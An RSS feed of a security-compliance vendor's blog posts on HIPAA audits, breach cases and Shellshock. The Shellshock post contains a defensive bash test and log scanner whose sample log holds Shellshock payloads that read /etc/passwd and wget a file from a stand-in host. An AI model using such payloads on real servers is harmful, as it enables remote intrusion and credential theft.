HIPAA – Aegify https://www.aegify.com Comprehensive Security, Risk and Compliance Assurance Solution (feed last built Tue, 31 May 2016 21:29:43 +0000)

HIPAA Audit: OCR Is On The Move
https://www.aegify.com/hipaa-audit-ocr-is-on-the-move/ (Tue, 29 Mar 2016 20:26:33 +0000)

Last week, the HHS Office for Civil Rights (OCR) announced the launch of phase 2 of the HIPAA Audit Program. OCR’s goal is to proactively uncover and address risks and vulnerabilities to protected health information (PHI). Effective immediately, OCR will ensure Covered Entities (CEs), their Business Associates (BAs) and vendors have comprehensive risk management frameworks in place.

CEs and BAs are required by law to implement a HIPAA security program and to meet the standards and implementation specifications of the Privacy, Security and Breach Notification Rules that OCR has selected for audit.

Friends, this is serious business. Earlier this month, North Memorial Health Care of Minnesota settled potential HIPAA violations with OCR for $1.55 million (see OCR’s 3/16/16 press release).

Can you withstand a fine or settlement of this amount?

CEs and their business associates are protected with Aegify RSC Suite, or alternatively through a combination of Aegify Risk Manager, Aegify Security Manager, Aegify Compliance Manager and Aegify BA-Vendor Manager. It’s easy to get started. Contact sales@aegify.com.

See OCR’s 3/21/16 press release announcing the Phase 2 audits.

Thank you,
The Aegify Team

Prepare for “Phase 2” HIPAA Audits
https://www.aegify.com/prepare-for-phase-2-hipaa-audits/ (Fri, 19 Jun 2015 06:32:36 +0000)

The Department of Health and Human Services’ Office for Civil Rights (HHS OCR) has announced its Phase 2 audit program. Auditors will concentrate on high-risk areas, will largely forgo on-site visits, and may feed audit findings into OCR’s formal enforcement program.

Phase 2 audits will be conducted by OCR staff and will follow a different methodology from the earlier audits. Unlike the comprehensive Phase 1 audits, Phase 2 audits will be narrowly focused. OCR intends to audit 350 covered entities and 50 business associates. It will audit 100 covered entities on the Privacy Rule, concentrating on the notice of privacy practices and on patient access to protected health information. For the first time, business associates are included in the audits; OCR will request a list of business associates from each audited covered entity.

OCR has indicated that adverse findings from Phase 2 and later audits could lead to civil monetary penalties or a resolution agreement. The expected second round of Phase 2 audits, and the audits conducted in 2016 and beyond, are likely to focus on device and media controls, transmission security, Privacy Rule safeguards, encryption and decryption, physical facility access controls, breach reports and complaint processes. How tightly the audit program is tied to enforcement may change, however, because OCR leadership is expected to change soon.

OCR will audit 150 covered entities on the Security Rule, focusing on risk analysis and the corresponding risk management. OCR learned in Phase 1 that, without confirmed contact details, a hard-copy audit notification can drag on indefinitely; in response, last year OCR collected address-verification information from more than 550 covered entities. Unlike Phase 1, OCR does not currently intend Phase 2 audits to include on-site visits, but this is subject to review.

Prepare for Your Office for Civil Rights Phase 2 Audit

The best way to prepare for a HIPAA audit is to fully document your privacy and security program, for example using the Aegify documentation management system.

If HIPAA auditors discover that an organization cannot produce adequate documentation, they will reasonably suspect that its compliance efforts are subpar. Healthcare organizations should have the following documents ready:

  • Security and privacy policies and procedures
  • Risk assessment and corrective action plan
  • Organizational chart outlining privacy and security responsibilities
  • Technology inventory, including all security tools used
  • Business associate agreements
  • Incident response plan
  • HIPAA compliance training materials

Aegify can help companies prepare for their OCR Phase 2 audits.

Anthem Breach Sounds Security Alarms against Data Hackers
https://www.aegify.com/anthem-breach-sounds-security-alarms/ (Wed, 11 Mar 2015 05:44:50 +0000)

The health insurer Anthem Inc., which manages Blue Cross plans across a dozen states, recently announced that a hacking incident compromised a database containing personal information on nearly 80 million individuals. Anthem believes the compromised, unencrypted information could include current and former members’ and employees’ names, birthdates, medical IDs and Social Security numbers, street and email addresses, and employment information. Some news reports attribute the attack to Chinese hackers; investigations to identify the culprits are ongoing. The Anthem breach is a warning to the healthcare sector that outsiders see great value in the data held by healthcare providers, health plans and business associates.

The Anthem breach, the largest in the healthcare industry since the HIPAA Breach Notification Rule came into force, is a lesson to healthcare organizations to strengthen their preventive and proactive measures and guard their databases from attackers. In a technology-centered business world, enterprises need to evaluate their networks and scan for weaknesses in order to protect their data from cyber criminals. The incident reinforces the need for healthcare businesses and their business associates to adhere to HIPAA, and it is a marked reminder of how important it is for HIPAA covered entities and BAs to assess and address, professionally, the risks to electronic protected health information (ePHI).

The incident is a stark reminder of the need for systematic risk analysis and risk management in technology-dependent healthcare organizations and their business associates. Even as experts point to the lack of encryption as a major factor in the breach, encryption is no silver bullet: data encrypted at rest remains readable through any account or application that is authorized to decrypt it, so an attacker who obtains valid credentials or plants malware on a trusted host can still read it.

The Anthem data breach is a cautionary call to all healthcare businesses to ensure compliance with the security controls detailed in the HIPAA/HITECH regulations.

Conclusion
Recent investigations also point to backdoor malware as a cause of the large-scale breach at Anthem; an intelligent continuous monitoring and analysis system could have detected the intrusion much earlier. The Aegify Security Posture Management tool is designed to prevent exploits across the entire IT infrastructure. Its flexible cloud-based architecture scans single or multiple assets, and its enterprise-class scanning covers nearly 32,000 vulnerabilities using about 92,000 checks across physical and virtual networks, operating systems, databases and web applications. Its automated compliance mapping, deployed across physical and virtual environments, provides continuous monitoring of security, risk and compliance with real-time status. Security posture assessment and management tools of this kind help enterprises protect their data from such breaches.

Common mistakes to avoid to be guarded from HIPAA Audits and Penalties in 2015
https://www.aegify.com/tips-to-avoid-hipaa-audits-2015/ (Thu, 12 Feb 2015 09:42:57 +0000)

Whatever the industry, the digital era makes protecting employee privacy, and health information in particular, a vital obligation of every employer. HIPAA and HITECH were designed to govern how this information is handled, but staying compliant with them is a daunting challenge in a world full of cyber criminals.

The past year saw enterprises and individuals across many industries, and the healthcare industry above all, fall prey to data breaches and HIPAA compliance failures. The Office for Civil Rights (OCR) has therefore taken firmer steps to ensure the privacy and security of data in 2015. Because OCR wants enterprises, medical practitioners, covered entities and their business associates to take proactive steps toward compliance with the Health Insurance Portability and Accountability Act, it intends to use the HIPAA audit program to check compliance levels at randomly selected organizations. With HIPAA audits on the horizon, enterprises need to institute sound practices and be audit-ready.

The HIPAA audit program was mandated by the HITECH Act (enacted as part of the 2009 stimulus legislation), and any reported breach affecting more than 500 individuals is likely to trigger an OCR investigation. Employers in other industries that handle health information therefore also need to take proactive steps toward compliance, or they too are liable to hefty fines.

Understanding some of the common pitfalls will help enterprises to avoid the same during HIPAA audits of 2015. These mistakes include:

  • Non-compliance with the Security Rule, for example by not keeping documentation current, not encrypting ePHI, and overlooking business associate agreements.
  • Failure to implement a security risk assessment and a compliance program that help employees understand why PHI, which includes sensitive clinical information and payment card data, must be protected.
  • Failure to establish a security program that proactively monitors security and performance indicators, and failure to continuously train and retrain employees with privileged access on the documented procedures for handling sensitive data and EHRs.
  • Failure to keep the Notice of Privacy Practices up to date.
  • Ignoring other privacy laws that interact with HIPAA.

With OCR using the HIPAA audit program to randomly assess covered entities and their business associates for compliance with the Privacy, Security and Breach Notification Rules, organizations must take a proactive approach to audits. As a first step, enterprises need to ensure that their compliance plan is documented and communicated across the whole organization.

With regulators favoring a risk-based approach, enterprises should use security and compliance programs such as Aegify to evaluate the risks and vulnerabilities in their environments. This helps them implement the security controls that address those issues, and it prepares the business to face OCR when its turn comes.

How Physicians can Avoid HIPAA Penalties in 2015
https://www.aegify.com/how-physicians-can-avoid-hipaa-penalties-in-2015/ (Mon, 09 Feb 2015 07:03:44 +0000)

As the healthcare industry moves toward digitization, electronic health records, even in protected formats, are becoming increasingly attractive to cyber criminals. Hardly a day goes by without news of hospitals or medical practitioners paying millions of dollars in penalties over the exposure of protected health information. According to Forrester, a single health record sells for $20 on the black market, while a complete patient dossier including driver’s license, health insurance information and other sensitive data can sell for $500.

Physicians whose Drug Enforcement Administration (DEA) number has been compromised, or who have faced a government investigation, understand the need to protect their patients’ electronic health information and avoid HIPAA penalties in 2015. Following the changes made by the HIPAA Omnibus Rule, the HHS Office for Civil Rights has stepped up scrutiny of medical practitioners who fall short of its requirements for protecting patient data. Physicians should understand that, depending on the level of culpability, civil penalties range from $100 to $50,000 per violation, and that where a violation results from “wilful neglect” the practitioner or business associate involved faces penalties of $10,000 to $50,000 per violation.

Healthcare professionals need to be very careful about how they handle patient data. Even the loss of a physician’s personal laptop containing PHI can amount to numerous violations, and professionals in that situation face penalties for failing to implement protective measures for EHR. Covered entities must also report such breaches to the affected individuals and to HHS.

While HIPAA imposes regulations and restrictions on medical practitioners, it also offers covered entities ways to avoid penalties. If a breach of protected health information is not the result of “wilful neglect” and the covered entity corrects the violation within 30 days, it may avoid a penalty. Beyond that, to limit liability under the HIPAA rules and avoid penalties arising from breaches of EHR, physicians need to conduct regular security risk assessments and implement administrative and technical safeguards. Executing business associate agreements with their business associates, giving employees effective training and monitoring their performance, and documenting all of these actions will also help covered entities avoid penalties. In the event of a breach, it is important to respond immediately to any suspected incident, and timely reporting is critical, since a late report may itself be construed as wilful neglect.

Conclusion
Integrating new technology may make 2015 a dynamic year for the healthcare industry. Physicians nevertheless need to take adequate steps to protect their practice revenues and stay compliant with HIPAA. Aegify is a continuous security monitoring and compliance management solution built on a framework approach that allows physicians, covered entities and business associates to gain control of, and improve, compliance across a number of regulations, including HIPAA and HITECH as well as country-specific ones. Its built-in vulnerability scanning is a simple and effective way to monitor security and HIPAA compliance levels, including the security risk analysis required for meaningful use.

Understanding HIPAA Ruling and its Impact on Breaches
https://www.aegify.com/understanding-hipaa-ruling/ (Wed, 17 Dec 2014 04:19:51 +0000)

The Connecticut case of Emily Byrne v. Avery Center for Obstetrics and Gynecology may set a trend in which healthcare providers and business associates face legal risk for failing to follow HIPAA or other privacy regulations. In this case a patient sued the clinic for releasing her medical records to a third party, in response to a subpoena, without informing her or obtaining her permission; the case illustrates the real impact of a data breach.

After Avery Center for Obstetrics and Gynecology released the records, the patient’s ex-boyfriend viewed her “highly sensitive” health records and used them to harass, embarrass and extort her. HIPAA itself does not allow individuals to file a lawsuit over violations of their privacy under the HIPAA regulations; instead, the plaintiff alleged that the clinic was negligent when it released confidential health records rather than protecting the patient’s information, with HIPAA as the standard of care it breached. Since the Connecticut Supreme Court ruling allowed a negligence claim based on alleged violations of HIPAA privacy standards, attorneys have been explaining the implications of the ruling.

Health data breach lawsuits filed under statutes other than HIPAA have required plaintiffs to show the impact of the breach. The case against Sutter Health was one such case; the courts dismissed it because the plaintiffs could not show evidence of harm, such as identity theft or fraud, caused by the breach. Even under the Byrne ruling, the impact of a breach on its victims plays a vital role in a negligence claim based on HIPAA. The standards HIPAA sets for privacy and for breaches therefore call on enterprises to put regular safeguards in place to protect patient information.

Healthcare organizations today receive heightened attention from regulators enforcing penalties for data breaches. Through its ruling in the Byrne case, the Connecticut Supreme Court sends a clear message to healthcare providers and their business associates to abandon weak encryption and other poor practices and to put an appropriate program in place to prevent data breaches. Those that fail to follow HIPAA now face legal risk from breach victims as well as from regulators.

With the HIPAA Omnibus Rule in effect since 2013, business associates and covered entities handling patient health information are directly responsible for HIPAA compliance and must encrypt data and avoid mistakes that expose it (encryption is an “addressable” specification under the Security Rule, but PHI that is not encrypted counts as unsecured PHI under the Breach Notification Rule, so its loss must be reported). The Aegify security and compliance monitoring system gives covered entities continuous security monitoring and effective compliance management that demystifies complex compliance regulations. Because the Aegify solution addresses the security and compliance requirements of both covered entities and business associates, individuals can be more confident that their private healthcare data remains safe and secure.

Don’t let ePHI make your business another Connecticut case of HIPAA Negligence
https://www.aegify.com/connecticut-case-of-hipaa-rule-negligence/ (Tue, 09 Dec 2014 04:44:12 +0000)

Technological growth has equipped today’s healthcare industry with a range of software applications and IT infrastructure that let it communicate, store and process patient health information digitally. With cyber threats looming over that IT-enabled environment, the Office for Civil Rights (OCR) enforces the HIPAA Privacy Rule, issued under the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which established rules protecting the privacy and security of personal health data.

The HIPAA Privacy Rule protects the privacy of individually identifiable health information. Alongside it, the HIPAA Security Rule sets national standards for the security of electronic protected health information; the HIPAA Breach Notification Rule requires covered entities and business associates to provide notification following a breach of unsecured protected health information; and the confidentiality provisions of the Patient Safety Rule protect identifiable information used to analyze patient safety events and improve patient safety. OCR enforces all of these.

HIPAA is a complex set of federal rules and regulations governing how medical institutions and their business associates treat private health information. With penalties for HIPAA violations substantial, legal experts are analyzing the impact of the Connecticut Supreme Court’s ruling on whether plaintiffs can sue a healthcare provider for negligence when HIPAA regulations have been violated by failing to protect patients’ privacy. Under the HIPAA Security Rule, HHS has set national standards for the security of protected health information (PHI) that is created, stored, transmitted or received electronically.

To ensure the confidentiality, integrity and availability of ePHI, the HIPAA Security Rule requires covered entities (including medical practitioners) and business associates to implement a series of administrative, physical and technical safeguards when working with ePHI. The Connecticut case of Emily Byrne v. Avery Center for Obstetrics and Gynecology, in which a patient sued a healthcare clinic that released her medical records to a third party without her authorization, is an example of one category of HIPAA violation: the impermissible disclosure of PHI. Failure to comply with HIPAA requirements leads to civil and criminal penalties that apply to covered entities and to individuals.

Covered entities and business associates should therefore take adequate steps to keep patient data safe from any sort of data breach. Aegify, a HIPAA/HITECH security and compliance management solution, provides continuous security monitoring and compliance management built on a framework approach, allowing covered entities and business associates to gain control of and improve compliance levels across HIPAA, HITECH, PCI, SOX, ISO and COBIT, as well as country-specific regulations. Its built-in vulnerability scanning makes security and compliance monitoring simple and effective, and it is designed to let large hospitals as well as small and medium healthcare establishments and their business associates continuously monitor the security of PHI against data breaches.

Healthcare Industry gears up to meet the EHR Audits in the New Year
https://www.aegify.com/healthcare-industry-gears-for-ehr-audits/ (Thu, 27 Nov 2014 12:03:28 +0000)

The EHR audits are around the corner. The Centers for Medicare & Medicaid Services (CMS) created the EHR Incentive Program to encourage healthcare providers to adopt electronic health record systems and secure data-sharing practices. While the meaningful use incentive program was intended to encourage the healthcare industry to digitize its data, providers who received incentive payments under the Medicare or Medicaid EHR Incentive Program are subject to audit. The Office of Inspector General (OIG) recently released its 2015 work plan, which states that it will continue to pay close attention to the healthcare industry’s use of electronic health records, in particular HIPAA security, EHR incentive payments and fraud. To prepare for auditing the digitized healthcare industry in the coming year, the OIG has also requested a $400 million budget for FY 2015, an increase of $105 million, and 284 additional full-time employees to help expand OIG audits and reviews covering IT security, compliance and electronic health records.

With federal money flowing through the EHR Incentive Program, hospitals, providers, vendors and consultants are working toward meaningful use of EHR. If a hospital or medical practitioner accepts federal money to put EHR to meaningful use, however, it must also prove it, using the appropriate electronic tools according to the norms set by CMS. Incidents such as those at Shelby Regional Medical Center in Texas and at Detroit Medical Center, which led to heavy financial losses, show that healthcare providers, their business associates and vendors must treat meaningful use of electronic patient health records as a compliance requirement. Eligible professionals, hospitals and critical access hospitals have accordingly been asked to maintain documentation supporting their attestations.

As Daniel R. Levinson, the U.S. Inspector General, points out, among the important changes taking place across the healthcare industry are an emphasis on coordinated care and increased use of electronic health records. The OIG will therefore need oversight approaches suited to an increasingly sophisticated healthcare system and adaptable enough to protect programs and patients from both existing and new vulnerabilities. OIG audits to date have found that one state agency overpaid 13 hospitals $3.1 million in federal EHR incentive money; the payment errors resulted from unclear and incorrect patient-volume calculations. Nearly 80% of the state’s hospitals analyzed in the audit also failed to comply with federal regulations.

In 2015 the OIG will therefore need to leverage data analytics and “forensic enhancements” to investigate increasingly sophisticated healthcare fraud, including fraud involving electronic health records.

The OIG will not only audit covered entities that received EHR incentive payments, but will also:

  • Identify EHR-related fraud and determine whether EHR systems address known vulnerabilities.
  • Review Medicaid and Medicare EHR incentive payments.
  • Analyze the IT security of community health centers funded by the Health Resources and Services Administration.
  • Regularly review the Centers for Medicare & Medicaid Services’ health information technology systems to check that the necessary security controls are in place.

Conducting mock audits will help healthcare providers stay prepared for both pre-payment and post-payment audits. It is also prudent to implement a comprehensive and effective security solution. Solutions such as Aegify Security Posture Management or Aegify SecureGRC, from leading providers of IT risk and compliance management, help healthcare establishments achieve meaningful use status while keeping breaches of security policy close to nil.

A disruption-free Medical Practice in a BA dependent industry
https://www.aegify.com/disruption-free-medical-practice-hippa-compliance/ (Tue, 11 Nov 2014 08:07:48 +0000)

An individual's medical information includes unique identifiers, demographic data, medical conditions, healthcare provider details, billing information, and the details and medical history of immediate family members. Advances in technology have made it possible to store these records electronically and access them quickly from any location. Yet even as every individual approaches a doctor trusting that his or her personal, sensitive and private data will be kept safe, the rising number of data breaches belies that trust.

To control such loss of data, the government made HIPAA and HITECH Act compliance mandatory for electronic health information exchange. A medical practitioner working in a digital environment therefore deploys systems for risk assessment and data encryption. However, besides doctors and other healthcare professionals, insurers, transcribers, pharmacologists and practice management services also access electronic health information. Under such circumstances, even if the doctors adhere to the HIPAA compliance requirements, data breaches may still result from loopholes in the systems of contractors and business associates.

With a large number of data loss cases resulting from loopholes in third-party providers' systems, the US government recently amended the HIPAA rules to extend the privacy and security requirements directly to business associates as well as covered entities. A recent incident, in which 11 hospitals of a major health system failed to meet the certification requirements for their EHR systems and had to return $31 million in meaningful use payments, shows that non-compliance with HIPAA and HITECH, even by a BA, can jeopardize a professional's medical practice. Studies from the Office for Civil Rights support this: 45% of healthcare providers and covered entities have had data breaches, and two-thirds of those incidents involved business associates.

Given the severe financial impact on both patients and healthcare providers, healthcare entities should take proactive steps to ensure that their medical practices are not put at risk. With the healthcare industry operating on a globalized platform, it is not always easy to monitor global BAs and the security of their systems and devices, even with a business associate agreement in place. To ensure that these BAs comply with the HIPAA Security Rule, the HIPAA Omnibus Rule addresses the privacy and security requirements that apply to them. While HIPAA/HITECH compliance requires covered entities to implement controls and safeguards to protect health information, the HIPAA Omnibus Rule demands an increased focus on the way covered entities work in conjunction with their business associates.

Enterprises in the healthcare sector should therefore make use of technologies that help them continuously monitor the security and compliance levels of business associates on a global scale. Solutions such as Aegify SecureGRC, an IT compliance management and continuous security monitoring solution, are built on a framework approach and allow enterprises to control and improve compliance levels across more than 400 regulations, covering HIPAA, HITECH, PCI, SOX, ISO, COBIT and other country-specific regulations. The built-in vulnerability scanning technology supports effective security and continuous monitoring. This ensures compliance with various regulations across multiple locations and demystifies the complexity of the compliance challenge.

The post A disruption-free Medical Practice in a BA dependent industry appeared first on Aegify.

Shellshock – New Vulnerability that Healthcare Sector must address now
https://www.aegify.com/new-vulnerabilities-shellshock/
Fri, 10 Oct 2014 14:44:01 +0000 (originally published at http://www.egestalt.com/blog/?p=807)

The federal tally of major breaches has reached 1,074 incidents affecting 33.7 million individuals since 2009, and more incidents are added to the list every day. Healthcare organizations around the world, although technologically sound with the latest equipment, embedded software and networked environments, are increasingly becoming targets for data breaches.

Enhanced technology lets them provide access to vital data across regions for better and faster clinical understanding and improved patient care. Nevertheless, that same mobility and accessibility is also why these organizations are challenged by data breaches. The most recent example is Community Health Systems earlier this year, where Chinese hackers are believed to have exploited the Heartbleed OpenSSL vulnerability to gain access to the data of 4.5 million patients of the hospital chain. Such incidents clearly indicate the wide range of risks faced by the healthcare sector.

A close study of the breaches by HHS shows hacking as the cause of at least 89 major breaches since 2009, and security experts believe these incidents are becoming more common and pose bigger threats. Besides hacking, insider threats and lack of encryption also cause data breaches, and the growth of digitally stored patient information has seen insider threats grow substantially. Although IT leaders work to harden perimeter defences, this threat-prone environment calls for healthcare organizations to take proactive measures to mitigate the risk posed by the Bash flaws known as Shellshock.

Shellshock refers to a family of security vulnerabilities (the first of which is CVE-2014-6271) in the Bourne-again shell, Bash, the command-line interpreter used across Unix-based systems, including Linux and Apple's Mac OS X. The flaw is that a vulnerable Bash, on start-up, treats any environment variable whose value begins with "() {" as a function definition and then executes whatever commands follow the function body. Any service that copies attacker-controlled input into the environment of a Bash process, such as a CGI script that receives HTTP headers, is therefore exposed to remote command execution. Since Bash exists across the Internet in web servers, email servers, standalone systems, physical security systems, routers and even web cams, researchers are identifying new Shellshock attacks in the wild on a daily basis.

Attackers can exploit the Shellshock flaw to execute shell commands remotely and potentially take control of systems in the healthcare sector. Through that access they can dump stored data and launch automated worms that exploit the same Bash vulnerability on other systems in the network. Security experts therefore call on enterprises across this sector to use systems that can scan for the Bash flaws and mitigate the risk. Most healthcare establishments already carry out periodic self-assessment and risk analysis as vital activities to prevent breaches.

However, advanced security solutions such as Aegify SecureGRC and Security Posture Management give these enterprises an ideal platform to identify this vulnerability and take the necessary measures to secure their environment against data breaches.

As a healthcare organization you need to:

  • Work with vendors to identify all systems that need patching, including those running Unix, Linux and Mac OS X, as well as Windows systems that ship a Bash port
  • Monitor and assess all technology-dependent medical devices and network devices for patching
  • Patch Internet-facing systems first, as they are the most exposed to remote exploitation of the Bash flaws
  • Continuously monitor logs and network traffic over a period of time to help identify any potentially compromised systems
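Two of the steps above, testing a host's Bash and monitoring web logs, can be scripted. The following is an added example for this post, not Aegify's code nor a feature of its products. The first function runs the widely published environment-variable test for CVE-2014-6271 against a given bash binary; the second greps access logs for the "() {" prefix that every Shellshock HTTP payload must carry. The log lines are constructed for the example, and the IP addresses are documentation ranges.

```shell
#!/bin/sh
# Added example (not Aegify code): two checks a healthcare IT team can run during
# a Shellshock (CVE-2014-6271) response.
#   1. check_bash_shellshock  - the widely published environment-variable test,
#      run against a given bash binary (default: the bash found on PATH).
#   2. scan_log_for_shellshock - a grep over web-server access logs for the
#      "() {" prefix every Shellshock HTTP payload has to carry.
# The log lines below are constructed for this example; the IPs are documentation ranges.

# ---- 1. Is this bash vulnerable? ---------------------------------------------
# A vulnerable bash parses an exported variable whose value starts with "() {" as a
# function definition and then EXECUTES whatever follows the closing brace.
# A patched bash ignores the trailing command (and warns on stderr), so the word
# "vulnerable" never reaches stdout. Prints: vulnerable | patched | missing
check_bash_shellshock() {
    bash_bin="${1:-bash}"
    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo missing
        return 0
    fi
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo done' 2>/dev/null) || true
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# ---- 2. Did anyone try it against our web tier? ------------------------------
# A Shellshock payload delivered over HTTP (User-Agent, Referer, Cookie, or any
# header a CGI handler copies into the environment) must begin with the
# function-definition token "() {", which makes that prefix a cheap,
# low-false-positive log signature. The optional space covers the "(){" variant.
SHELLSHOCK_RE='\(\) *\{'

# Print every line of the given log files (or stdin) that carries a payload.
scan_log_for_shellshock() {
    grep -E "$SHELLSHOCK_RE" "$@"
}

# Constructed Apache/nginx-style access log: two exploit attempts, one benign hit.
SAMPLE_LOG='198.51.100.7 - - [10/Oct/2014:14:44:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cat /etc/passwd\""
192.0.2.15 - - [10/Oct/2014:14:44:03 +0000] "GET /index.html HTTP/1.1" 200 3210 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Oct/2014:14:44:05 +0000] "GET /cgi-bin/hello.sh HTTP/1.1" 200 88 "() { :;}; /usr/bin/wget http://203.0.113.9/x -O /tmp/x" "curl/7.30"'

# Number of sample log lines carrying a Shellshock payload.
shellshock_hits() {
    printf '%s\n' "$SAMPLE_LOG" | grep -cE "$SHELLSHOCK_RE"
}

# Distinct source addresses to block or investigate, one per line.
shellshock_sources() {
    printf '%s\n' "$SAMPLE_LOG" | scan_log_for_shellshock | awk '{print $1}' | sort -u
}

# Stand-alone report when the script is run directly.
echo "local bash: $(check_bash_shellshock)"
echo "payload lines in sample log: $(shellshock_hits)"
echo "sources:"
shellshock_sources
```

Run the bash check on every Unix-like host and device image you can reach, not just the web servers; a "patched" result only covers the binary you pointed it at, and the first Bash fix was incomplete (CVE-2014-7169 and later IDs followed), so confirm the vendor's package version rather than stopping at this one test. For real log volumes, pass the log files to scan_log_for_shellshock instead of the embedded sample.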

As with HIPAA compliance generally, both covered entities and business associates need to take proactive measures to handle Shellshock, address the underlying vulnerabilities and prevent the resulting data breaches.

Aegify Security Posture Management, an innovative, fully cloud-based, automated and integrated security monitoring and compliance assessment tool, takes the complexity out of security posture and compliance management for healthcare entities. It simplifies protecting their physical and virtual environments and IT infrastructure from breaches by cyber attackers while also meeting regulatory requirements. With features such as continuous security monitoring, a vulnerability management engine, physical and virtual network scans, interoperability, remediation and multi-layered vulnerability analysis, Aegify's security solutions provide a complete end-to-end solution to identify security gaps and help enterprises apply the related patches or use virtual patching.

The post Shellshock – New Vulnerability that Healthcare Sector must address now appeared first on Aegify.
